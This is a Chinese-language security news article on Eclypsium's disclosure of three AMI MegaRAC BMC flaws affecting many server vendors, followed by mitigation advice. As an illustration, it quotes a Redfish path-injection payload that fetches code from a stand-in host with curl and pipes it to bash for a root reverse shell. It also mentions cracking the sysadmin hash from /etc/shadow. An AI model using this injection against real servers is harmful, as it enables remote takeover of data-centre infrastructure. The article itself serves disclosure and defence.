严重的 AMI MegaRAC 漏洞影响 AMD、ARM、HPE、Dell等公司的服务器

©网络研究院

American Megatrends MegaRAC Baseboard Management Controller (BMC) 软件中的三个漏洞影响许多云服务和数据中心提供商使用的服务器设备。

Eclypsium 于 2022 年 8 月发现了这些缺陷，攻击者可以在特定条件下执行代码、绕过身份验证和执行用户枚举。

研究人员在检查了 American Megatrends 泄漏的专有代码（特别是 MegaRAC BMC 固件）后发现了这些缺陷。

MegaRAC BMC 是一个完整的“带外”和“无人值守”远程系统管理解决方案，允许管理员远程对服务器进行故障排除，就像站在设备前一样。

MegaRAC BMC 固件被至少 15 家服务器制造商使用，包括 AMD、Ampere Computing、ASRock、Asus、ARM、Dell EMC、Gigabyte、Hewlett-Packard Enterprise、Huawei、Inspur、Lenovo、Nvidia、Qualcomm、Quanta 和 Tyan。

Eclypsium 发现并报告给 American Megatrends 和受影响供应商的三个漏洞如下：

• CVE-2022-40259：由于不正确地向用户公开命令，Redfish API 存在任意代码执行缺陷。（CVSS v3.1 得分：9.9“严重”）
• CVE-2022-40242：系统管理员用户的默认凭据，允许攻击者建立管理外壳。（CVSS v3.1 得分：8.3“高”）
• CVE-2022-2827：请求操作缺陷允许攻击者枚举用户名并确定帐户是否存在。（CVSS v3.1 得分：7.5“高”）
  
  

三个漏洞中最严重的漏洞 CVE-2022-40259 需要事先至少访问一个低权限帐户才能执行 API 回调。

Eclypisum 表示：“唯一的问题是攻击位于路径参数中，但它不是由框架进行 URL 解码的，因此需要专门设计漏洞利用，使其对每个 URL 和每个 bash shell 命令都有效。”

对于 CVE-2022-40242 的利用，攻击者的唯一先决条件是能够远程访问设备。

前两个漏洞非常严重，因为攻击者无需进一步升级即可访问管理 shell。

如果成功利用这些漏洞，可能会导致数据操纵、数据泄露、服务中断、业务中断等。

第三个缺陷不会对安全产生重大的直接影响，因为知道目标上存在哪些帐户不足以造成任何损害。

但是，它会为暴力破解密码或执行凭据填充攻击开辟道路。

Eclypsium 在报告中评论说：“由于数据中心倾向于在特定硬件平台上标准化，任何 BMC 级别的漏洞很可能适用于大量设备，并可能影响整个数据中心及其提供的服务。”

“服务器组件上托管和云提供商的标准化意味着这些漏洞很容易影响数十万甚至数百万个系统。”

建议系统管理员禁用远程管理选项，并尽可能添加远程身份验证步骤。

此外，管理员应尽量减少 Redfish 等服务器管理界面的外部暴露，并确保在所有系统上安装最新可用的固件更新。

供应链漏洞使服务器生态系统面临风险

BMC&C

Eclypsium Research 发现并报告了 American Megatrends, Inc. (AMI) MegaRAC 底板管理控制器 (BMC) 软件中的 3 个漏洞。我们将这些漏洞统称为 BMC&C。MegaRAC BMC 被许多领先的服务器制造商广泛使用，为其服务器产品提供“无人值守”管理功能。已知使用过MegaRAC BMC的服务器厂商包括但不限于以下： 

AMD	Ampere Computing	ASRock
Asus	ARM	Dell EMC
Gigabyte	Hewlett-Packard Enterprise	Huawei
Inspur	Lenovo	NVidia
Qualcomm	Quanta	Tyan

BMC&C 漏洞的严重程度从中等到严重，包括远程代码执行和具有超级用户权限的未授权设备访问。可以访问远程管理界面（ Redfish、IPMI）的远程攻击者可以利用这些漏洞。Redfish 是传统 IPMI 的继承者，并为服务器基础设施和支持现代数据中心的其他基础设施的管理提供 API 标准。几乎所有主要服务器和基础设施供应商以及 OpenBMC 固件项目都支持 Redfish。

这些漏洞对构成云计算基础的技术供应链构成了重大风险。简而言之，一个组件供应商的漏洞会影响到许多硬件供应商，而这反过来又会传递给许多云服务。因此，这些漏洞可能会对组织直接拥有的服务器和硬件以及支持他们使用的云服务的硬件构成风险。

BMC 旨在为管理员提供对他们管理的服务器的近乎全面和远程的控制。AMI 是为众多硬件供应商和云服务提供商提供 BMC 和 BMC 固件的领先供应商。因此，这些漏洞可能会影响大量设备，并可能使攻击者不仅可以控制设备，还可以对数据中心和云服务造成损害

发现的漏洞由以下 CVE 解决：

• CVE-2022-40259 – 通过 Redfish API 执行任意代码
• CVE-2022-40242 – UID = 0 shell 通过 SSH 的默认凭据
• CVE-2022-2827 – 通过 API 进行用户枚举

利用这些漏洞的影响包括远程控制受感染的服务器、远程部署恶意软件、勒索软件和固件植入，以及服务器物理损坏（变砖）。目前，尚不清楚这些漏洞是否正在被积极利用。

这些风险被 MegaRAC 作为世界领先的 BMC 远程提供商的地位放大了 。

管理固件，位于 BMC 供应链的顶端。该固件是现代计算的基础组件，存在于全球数据中心、服务器场和云基础设施中的数十万台服务器中。由于这些环境中的设备通常在硬件配置上进行标准化，因此易受攻击的配置可能会在数千台设备之间共享。此外，部分研究是通过在互联网上发现大量 AMI 知识产权而实现的。这些信息的可用性自然会增加野外攻击的可能性。 

Eclypsium Research 一直遵循协调的漏洞披露流程，包括 AMI 和其他受影响的各方。此外，AMI 和 Eclypsium 已经联系了多方，他们正在努力确定受影响的产品和服务的范围。

关于 MegaRAC 底板管理控制器 (BMC)

底板管理控制器 (BMC) 是功能强大且具有特权的组件，可为现代服务器提供带外管理。就所有意图和目的而言，BMC 是服务器内功能齐全的独立计算机，配备了自己的独立电源、固件、内存和网络堆栈。这允许远程管理员几乎控制设备上的所有内容，从低级硬件设置到管理主机操作系统、虚拟主机、应用程序或数据。BMC 可以让管理员管理主机，即使主机本身处于关闭状态。 

BMC 的独特力量和能力使它们在受到攻击者破坏时特别危险。最近，攻击者使用了称为iLOBleed的 BMC 植入程序攻击数据中心并彻底擦除服务器磁盘。同样重要的是，iLOBleed 使用固件的独特功能反复执行此操作。由于恶意代码隐藏在BMC固件中，即使重装服务器操作系统后，植入程序仍能持续存在，使攻击者能够在服务器恢复后重复破坏数据的循环。此外，该植入程序还采取了额外的步骤，以静默方式阻止系统更新 BMC 固件，同时伪造结果，使固件看起来像是已更新。虽然 iLOBleed 植入与 BMC&C 漏洞没有直接关系，但它们是攻击者可以对大量可访问其 BMC 的设备造成损害的真实示例。

云供应链中的断层线

要正确了解 BMC&C 漏洞的范围，了解 AMI MegaRAC 在云数据中心供应链中扮演的角色非常重要。自然地，由于能够从物理硬件的成本和持续维护中抽象出计算资源，许多企业被云所吸引。然而，云最终仍然在硬件上运行——这意味着来自许多不同供应商的大量服务器。

MegaRAC BMC 固件是连接云下的许多硬件的常见线程之一。因此，MegaRAC 中的任何漏洞都可以很容易地通过扩展的供应链传播，影响数十家供应商并可能影响数百万台服务器。此外，为了从硬件中抽象计算，数据中心内的物理服务器必须可以互换。为此，云提供商对服务器组件、硬件配置、固件和操作系统版本以及管理程序软件进行了标准化。因此，如果在数据中心环境中使用易受攻击的 BMC，则很可能会有成百上千台设备共享相同的漏洞。在攻击的情况下，这可能会使整个云处于危险之中。 

发现过程

2022 年 8 月，Eclypsium Research 了解到据称来自 AMI 的知识产权泄露，该泄露已发布在网上。下载并审查数据后，它看起来是合法的，并且由于其他人有可能访问过它，因此决定寻找漏洞以防恶意行为者做同样的事情。重点很快缩小到 Redfish API，因为它可以远程访问并且是攻击者的首选。 

漏洞详情

• CVE-2022-40259 – 通过 Redfish API 执行任意代码
• CVE-2022-40242 – UID = 0 shell 通过 SSH 的默认凭据
• CVE-2022-2827 – 通过 API 进行用户枚举
  
  

BMC&C 攻击场景

CVE-2022-40259 – 通过 Redfish API 执行任意代码

CVSS v3.1 分数：9.9 严重

为了发现这个问题，我们最初审查了潜在危险的调用，例如命令执行调用。我们将其缩小到只公开给用户的调用，Redfish API 实现中就有一个。唯一复杂的是攻击位于路径参数中，但它不是由框架进行 URL 解码，因此需要专门设计漏洞利用以使其对每个 URL 和每个 bash shell 命令都有效。该漏洞大致如下所示（请注意，我们已经删除了一些细节——比如它的实际位置——以免为攻击者发布现成的漏洞）：

http:///super/secret/path;curl${IFS}domain.com|bash;

路径需要在 HTTP 请求中按原样发送。domain.com 需要托管反向 shell（我们不会提供反向 shell，但它使用板载可用的脚本语言，否则不起眼）。此漏洞利用直接进入 UID = 0 shell（UID = 0 用户，容易混淆，称为 sysadmin），并且确实要求攻击者在设备上具有最低访问级别（回调或更高）。

CVE-2022-40242 – UID = 0 shell 通过 SSH 的默认凭据

CVSS v3.1 分数：8.3 高

作为枚举的第二部分，我们在 Linux 系统的正常位置寻找可用的凭据。我们为 sysadmin 用户找到了一个哈希值并设法破解了它。密码看起来像是默认密码，我们设法找到了其他人早在 2014 年就对它的反向引用。找到它们留给读者作为练习：/etc/shadow

CVE-2022-2827 – 通过 API 进行用户枚举

CVSS v3.1 分数：7.5 高

当请求重设密码时，其中一个参数可以被操纵，从而可以确定用户是否存在，除了用户名本身之外没有其他先验知识。该漏洞还允许攻击者通过遍历可能的帐户名称列表来测试用户帐户是否存在。

攻击场景

前两个 CVE（CVE-2022-40259、CVE-2022-40242）直接进入 UID = 0 管理 shell，无需进一步升级。CVE-2022-40259 需要事先访问至少一个低权限帐户（回调权限或更高权限），而 CVE-2022-40242 只需要远程访问设备，尽管在某些设备上可能会禁用此帐户。第三个漏洞 (CVE-2022-2827) 需要额外的步骤才能完全利用；例如，它允许精确定位预先存在的用户并且不会导致进入 shell，但会为攻击者提供一个目标列表以进行暴力或撞库攻击。

在攻击者可以访问受影响服务器的 BMC 的任何情况下，这些漏洞都可能带来严重的风险。作为一项安全最佳实践，BMC 不应直接暴露在 Internet 上，并且在首次披露后进行的扫描表明，与其他基础设施产品中近期备受瞩目的漏洞相比，公开暴露相对较低。但是，由于配置错误或安全卫生不佳而暴露的 BMC 是很常见的。此外，这些漏洞可能会被获得数据中心或管理网络初始访问权限的攻击者利用。由于数据中心倾向于在特定硬件平台上进行标准化，任何 BMC 级别的漏洞很可能适用于大量设备，并可能影响整个数据中心及其提供的服务。由于 BMC 漏洞的性质和位置，检测利用非常复杂，因为标准 EDR 和 AV 产品专注于操作系统，而不是底层固件。 

缓解措施

• 确保其环境中的所有远程服务器管理接口（例如 Redfish、IPMI）和 BMC 子系统都在其专用管理网络上并且不暴露在外部，并确保内部 BMC 接口访问仅限于具有 ACL 或防火墙的管理用户。
  
• 查看设备固件的供应商默认配置，以识别和禁用内置管理帐户和/或在可用时使用远程身份验证。
  
• 在关键服务器中执行定期软件和固件更新。
  
• 确保漏洞评估包括远程服务器管理子系统（如 MegaRAC、iDRAC、iLO 等）和关键固件。
  
• 确保服务器中的所有关键固件都受到定期监控，以发现泄露或未经授权修改的迹象。
  
• 对新设备进行供应链检查。评估所有新服务器是否已修补主要漏洞并安装最新的固件更新。
  
• 对于 Eclypsium 客户，该平台将通过动态更新扫描结果的新功能覆盖最近发现的漏洞。 
  
  

确保固件供应链的安全是一个复杂的问题，由于 OEM 将代码集成到其产品中的方式，在供应链顶端发现的漏洞会带来巨大的风险。固件漏洞修复起来并非易事，因为它们在计算堆栈中的位置并未针对大规模修补进行优化。此外，服务器组件上托管和云提供商的标准化意味着这些漏洞很容易影响数十万甚至数百万个系统。 

随着攻击者将他们的注意力从面向用户的操作系统转移到硬件所依赖的较低级别的嵌入式代码，妥协变得更难检测，修复起来也呈指数级增长。虽然服务器操作系统的危害可以通过擦除和重新安装来解决，但固件危害有可能在重新安装和更换硬盘驱动器等更严厉的措施之后仍然存在。必须对这一领域进行安全研究，以领先于攻击并保护现代计算所依赖的基础。

长按添加关注，为您保驾护航！

原文始发于微信公众号（网安百色）：严重的 AMI MegaRAC 漏洞影响 AMD、ARM、HPE、Dell等公司的服务器